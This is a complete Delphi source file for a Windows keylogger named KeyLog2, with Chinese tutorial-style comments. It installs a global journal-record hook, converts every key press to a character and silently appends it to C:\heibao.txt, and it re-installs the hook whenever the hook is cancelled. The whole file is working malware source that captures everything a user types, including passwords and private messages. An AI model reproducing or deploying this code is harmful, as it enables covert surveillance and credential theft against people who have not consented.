program KeyLog2;
uses
Windows,
Messages;

var JournalRecordHook: HHOOK;

// 记录钩子回调函数
function JournalRecordProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
Kbs: TKeyboardState; // 键盘状态类型
HFile: THandle;    // 句柄类型
WChar: array[0..1] of Char;
WSize: DWORD;
{API函数 ToAscii GetKeyboardState}
begin
// lParam指向消息结构, 并且, 是键盘按下消息
if (nCode = HC_ACTION)and (PEventMsg(lParam).message = WM_KEYDOWN) then
//(PEventMsg(lParam).message = WM_KEYDOWN)转换为一种消息类型 WM_KEYDOWN
//(nCode = HC_ACTION)键盘状态是HC_ACTION 激活
begin
  // 取键盘状态
  //GetKeyboardState() 取键盘状态并且存入到括号里
   GetKeyboardState(Kbs);
   //GetKeyboardState存入(KBS)里 取键盘状态

  // 转换成字符,组合
   if ToAscii(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH, Kbs, WChar, 0) = 1 then
   //(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH,固定参数
   //WChar 固定参数
   begin
   // 打开文件
   HFile := CreateFile('C:\heibao.txt', GENERIC_WRITE,
   FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);

   // 添加字符
   SetFilePointer(HFile, 0, nil, FILE_END);
   WriteFile(HFile, WChar[0] , 1, WSize, nil);

   // 回车补#10
   if (WChar[0] = #13) then
   begin
   WChar[0] := #10;
   WriteFile(HFile, WChar[0] , 1, WSize, nil);
   end;

   // 关闭保存
   CloseHandle(HFile);
   end;
end;

// 传给下一个钩子处理, 并且返回它的返回值
Result := CallNextHookEx(JournalRecordHook, nCode, wParam, lParam);
  //Result := CallNextHookEx(hook,后三个固定参数nCode, wParam, lParam);
end;

// ~~~~~ 程序入口 ~~~~~
var
Msg: TMsg;// 消息类型，固定
begin
// 安装钩子
JournalRecordHook := SetWindowsHookEx(WH_JOURNALRECORD, @JournalRecordProc, HInstance, 0);

// 消息循环
while GetMessage(Msg, 0, 0, 0) do
// GetMessage(Msg, 0, 0, 0) 后面的三个零固定参数
   if (Msg.message = WM_CANCELJOURNAL) then // 此时需要重新挂钩
   //if (Msg.message = WM_CANCELJOURNAL) then 判断钩子是否退出
   begin
   JournalRecordHook :=
   SetWindowsHookEx(WH_JOURNALRECORD, @JournalRecordProc, HInstance, 0);
   end;

// 卸载钩子
UnHookWindowsHookEx(JournalRecordHook);
end.